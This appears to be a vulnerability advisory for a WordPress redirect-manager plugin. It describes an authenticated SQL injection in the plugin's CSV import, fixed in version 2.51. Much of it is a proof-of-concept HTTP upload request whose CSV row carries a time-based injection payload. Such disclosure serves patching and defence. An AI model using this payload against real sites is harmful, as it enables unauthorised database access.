WordPress Plugin Vulnerabilities

301 Redirects - Easy Redirect Manager < 2.51 - Authenticated SQL Injection

Description

The plugin does not sanitise its "Redirect From" column when importing a CSV file, allowing high privilege users to perform SQL injections.

The PoC video provided mentioned 2.53 as vulnerable, however v2.45 was installed and used. The issue has been verified to have been fixed in 2.51

Proof of Concept

POST /wp-admin/options-general.php?page=eps_redirects&tab=import-export HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/options-general.php?page=eps_redirects&tab=import-export
Content-Type: multipart/form-data; boundary=---------------------------28588551781499779692758371208
Content-Length: 682
Connection: close
Cookie: [Admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_nonce_submit"

283965d8a1
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_file"; filename="2021-01-19-redirects.csv"
Content-Type: text/csv

301,' or sleep(2)#,/yolo,0

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload"

Upload CSV
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_method"

skip
-----------------------------28588551781499779692758371208--